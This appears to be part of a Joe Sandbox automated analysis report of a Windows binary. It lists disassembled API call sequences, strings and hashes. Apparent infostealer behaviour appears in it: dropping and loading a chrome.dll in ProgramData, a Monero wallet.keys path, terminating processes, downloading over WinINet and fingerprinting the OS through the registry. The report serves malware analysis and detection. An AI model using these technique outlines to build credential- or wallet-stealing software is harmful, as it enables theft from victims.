                                  • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExitProcess$DefaultLangUser
                                  • String ID: *
                                  • API String ID: 1494266314-163128923
                                  • Opcode ID: 461f7c76c8ab48eb96aacde8f68eb284b3a12e24968e25f7e1abd041dc61a34c
                                  • Instruction ID: d32ab38d41939336b0855f01cdb1a771b1cd22d51307f055724566e5bd0e9e0e
                                  • Opcode Fuzzy Hash: 461f7c76c8ab48eb96aacde8f68eb284b3a12e24968e25f7e1abd041dc61a34c
                                  • Instruction Fuzzy Hash: 0AF03A329DE219EFD3449FE4A80979CFB30AB04706F118296E619961D0E6756A80EB51
                                  APIs
                                    • Part of subcall function 0071AA50: lstrcpy.KERNEL32(00720E1A,00000000), ref: 0071AA98
                                    • Part of subcall function 00719850: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,007108DC,C:\ProgramData\chrome.dll), ref: 00719871
                                    • Part of subcall function 0070A090: LoadLibraryA.KERNEL32(C:\ProgramData\chrome.dll), ref: 0070A098
                                  • StrCmpCA.SHLWAPI(00000000,011D90B0), ref: 00710922
                                  • StrCmpCA.SHLWAPI(00000000,011D8FE0), ref: 00710B79
                                  • StrCmpCA.SHLWAPI(00000000,011D8F80), ref: 00710A0C
                                    • Part of subcall function 0071AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0071AAF6
                                  • DeleteFileA.KERNEL32(C:\ProgramData\chrome.dll), ref: 00710C35
                                  Strings
                                  • C:\ProgramData\chrome.dll, xrefs: 007108CD
                                  • C:\ProgramData\chrome.dll, xrefs: 00710C30
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Filelstrcpy$CreateDeleteLibraryLoad
                                  • String ID: C:\ProgramData\chrome.dll$C:\ProgramData\chrome.dll
                                  • API String ID: 585553867-663540502
                                  • Opcode ID: 7cd7dfcd335899e174891d84b15df1290be95bcb79a2a6838ed7696d95c8df83
                                  • Instruction ID: dd6f5ac2b9dc3ef77db8e1e580c99a9cceee4f1e857f4534f95627a343072f3a
                                  • Opcode Fuzzy Hash: 7cd7dfcd335899e174891d84b15df1290be95bcb79a2a6838ed7696d95c8df83
                                  • Instruction Fuzzy Hash: 21A15671700248EFCB28EF68D996EED77B6AF94300F50816DE40A5F391DA349B45CB92
                                  APIs
                                    • Part of subcall function 00718CF0: GetSystemTime.KERNEL32(00720E1B,011DA4D8,007205B6,?,?,007013F9,?,0000001A,00720E1B,00000000,?,011D8F90,?,\Monero\wallet.keys,00720E1A), ref: 00718D16
                                  • wsprintfA.USER32 ref: 00709E7F
                                  • lstrcat.KERNEL32(00000000,?), ref: 00709F03
                                  • lstrcat.KERNEL32(00000000,?), ref: 00709F17
                                  • lstrcat.KERNEL32(00000000,007212D8), ref: 00709F29
                                  • lstrcpy.KERNEL32(?,00000000), ref: 00709F7C
                                  • Sleep.KERNEL32(00001388), ref: 0070A013
                                    • Part of subcall function 007199A0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 007199C5
                                    • Part of subcall function 007199A0: Process32First.KERNEL32(0070A056,00000128), ref: 007199D9
                                    • Part of subcall function 007199A0: Process32Next.KERNEL32(0070A056,00000128), ref: 007199F2
                                    • Part of subcall function 007199A0: OpenProcess.KERNEL32(00000001,00000000,?), ref: 00719A4E
                                    • Part of subcall function 007199A0: TerminateProcess.KERNEL32(00000000,00000000), ref: 00719A6C
                                    • Part of subcall function 007199A0: CloseHandle.KERNEL32(00000000), ref: 00719A79
                                    • Part of subcall function 007199A0: CloseHandle.KERNEL32(0070A056), ref: 00719A88
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$CloseHandleProcessProcess32$CreateFirstNextOpenSleepSnapshotSystemTerminateTimeToolhelp32lstrcpywsprintf
                                  • String ID: D
                                  • API String ID: 531068710-2746444292
                                  • Opcode ID: 24f6466400b9e7fad0b87fd25dc957a5be3be8f508be21a704009b43a35d1969
                                  • Instruction ID: 198ff437270fb4693e6beaa4c5b61aa844457ddec6f61f9589480952423339e4
                                  • Opcode Fuzzy Hash: 24f6466400b9e7fad0b87fd25dc957a5be3be8f508be21a704009b43a35d1969
                                  • Instruction Fuzzy Hash: B25178B5944318EBEB24DBA4DC4AFDA7378AB44704F004598B60DAB2C1EB756BC4CF51
                                  APIs
                                  • _ValidateLocalCookies.LIBCMT ref: 0077FA1F
                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 0077FA27
                                  • _ValidateLocalCookies.LIBCMT ref: 0077FAB0
                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 0077FADB
                                  • _ValidateLocalCookies.LIBCMT ref: 0077FB30
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                  • String ID: csm
                                  • API String ID: 1170836740-1018135373
                                  • Opcode ID: 73bc2f32c22e0088af07211562fb197d2e7e36a363a5a26788fe809058fe556b
                                  • Instruction ID: a34003ccd3c8e5a087d7ceee8e9e941054c5645e4d0746d2d6157eda08b2796a
                                  • Opcode Fuzzy Hash: 73bc2f32c22e0088af07211562fb197d2e7e36a363a5a26788fe809058fe556b
                                  • Instruction Fuzzy Hash: AE41E530A00209EFCF10EF68C984A9EBBB5FF4A364F15C165E91CAB391D7399905CB91
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0070501A
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00705021
                                  • InternetOpenA.WININET(00720DE3,00000000,00000000,00000000,00000000), ref: 0070503A
                                  • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00705061
                                  • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00705091
                                  • InternetCloseHandle.WININET(?), ref: 00705109
                                  • InternetCloseHandle.WININET(?), ref: 00705116
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                                  • String ID:
                                  • API String ID: 3066467675-0
                                  • Opcode ID: eb5e10b7e7a5b23d6a52367caf513b344248fe55b90f9f6dbd840b8d7b9a79eb
                                  • Instruction ID: dc2e57a2aaec0fabc68e0f242afb958206550eb680e79d5aaf16df1106ac79b0
                                  • Opcode Fuzzy Hash: eb5e10b7e7a5b23d6a52367caf513b344248fe55b90f9f6dbd840b8d7b9a79eb
                                  • Instruction Fuzzy Hash: 9F3119B4A45218EBDB20CF94DC85BDDB7B4AB48304F1081D9FB09A7281D7746EC58F98
                                  APIs
                                  • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 007185B6
                                  • wsprintfA.USER32 ref: 007185E9
                                  • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0071860B
                                  • RegCloseKey.ADVAPI32(00000000), ref: 0071861C
                                  • RegCloseKey.ADVAPI32(00000000), ref: 00718629
                                    • Part of subcall function 0071AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0071AAF6
                                  • RegQueryValueExA.ADVAPI32(00000000,011DE1D0,00000000,000F003F,?,00000400), ref: 0071867C
                                  • lstrlen.KERNEL32(?), ref: 00718691
                                  • RegQueryValueExA.ADVAPI32(00000000,011DE1E8,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00720B3C), ref: 00718729
                                  • RegCloseKey.ADVAPI32(00000000), ref: 00718798
                                  • RegCloseKey.ADVAPI32(00000000), ref: 007187AA
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                                  • String ID: %s\%s
                                  • API String ID: 3896182533-4073750446
                                  • Opcode ID: 486f54af4a6fe91b8406eb7f9df8459267392f85db67bad5502cd45efd70b33b
                                  • Instruction ID: 46b87f4fbbbbeebc2c98add4c6349593769789ccdd1b9584706798bc0ab6dcfd
                                  • Opcode Fuzzy Hash: 486f54af4a6fe91b8406eb7f9df8459267392f85db67bad5502cd45efd70b33b
                                  • Instruction Fuzzy Hash: D4213B71A55218ABDB64DB94DC85FE9B3B8FB48700F0081D9A209A6180DF746AC5CFE4
                                  APIs
                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 007199C5
                                  • Process32First.KERNEL32(0070A056,00000128), ref: 007199D9
                                  • Process32Next.KERNEL32(0070A056,00000128), ref: 007199F2
                                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00719A4E
                                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 00719A6C
                                  • CloseHandle.KERNEL32(00000000), ref: 00719A79
                                  • CloseHandle.KERNEL32(0070A056), ref: 00719A88
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                                  • String ID:
                                  • API String ID: 2696918072-0
                                  • Opcode ID: 9f09f95ce467bee5692f02a613faaefaebc713bad4938c1e8ea0891fcb083908
                                  • Instruction ID: c4681a123760bd5b061055cc38d697e6c6a46a39aa1923d2ea09546504160a7d
                                  • Opcode Fuzzy Hash: 9f09f95ce467bee5692f02a613faaefaebc713bad4938c1e8ea0891fcb083908
                                  • Instruction Fuzzy Hash: C2211A74958218ABDB25DFA5CC99BDDB7B9BF48300F0081C9E609A6290D7789FC5CF50
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00717834
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 0071783B
                                  • RegOpenKeyExA.ADVAPI32(80000002,011CB428,00000000,00020119,00000000), ref: 0071786D
                                  • RegQueryValueExA.ADVAPI32(00000000,011DE248,00000000,00000000,?,000000FF), ref: 0071788E
                                  • RegCloseKey.ADVAPI32(00000000), ref: 00717898
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                  • String ID: Windows 11
                                  • API String ID: 3225020163-2517555085
                                  • Opcode ID: b060b40cea207fce06eecf0a639cd194ecd6feaa59e95a60acc8889c2d042e26
                                  • Instruction ID: ab4110db6278e55418b68b6d072b7d9cf3d0c81ad4b69f40ab5f765db8f29242
                                  • Opcode Fuzzy Hash: b060b40cea207fce06eecf0a639cd194ecd6feaa59e95a60acc8889c2d042e26
                                  • Instruction Fuzzy Hash: C0014475A5D305BBE704DBE4ED49FADB778EB44700F104159F605A6280E674A980DB60
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 007178C4
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 007178CB
                                  • RegOpenKeyExA.ADVAPI32(80000002,011CB428,00000000,00020119,00717849), ref: 007178EB
                                  • RegQueryValueExA.ADVAPI32(00717849,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0071790A
                                  • RegCloseKey.ADVAPI32(00717849), ref: 00717914
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                  • String ID: CurrentBuildNumber
                                  • API String ID: 3225020163-1022791448
                                  • Opcode ID: 3f203f75908c85911c0a2f54e69bbeccf4934c743e4c44a839c17622d8da183c
                                  • Instruction ID: cf78945fc12bf95237a77977d2b775affd543d99a36daca8bada88596c67750d
                                  • Opcode Fuzzy Hash: 3f203f75908c85911c0a2f54e69bbeccf4934c743e4c44a839c17622d8da183c
                                  • Instruction Fuzzy Hash: CA0184B5A99309BFDB00DBD4DC49FAEB778EB04700F004585F605A6280E7706A40DBA0
                                  APIs
                                  • CreateFileA.KERNEL32(>=q,80000000,00000003,00000000,00000003,00000080,00000000,?,00713D3E,?), ref: 0071948C
                                  • GetFileSizeEx.KERNEL32(000000FF,>=q), ref: 007194A9
                                  • CloseHandle.KERNEL32(000000FF), ref: 007194B7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmpDownload File
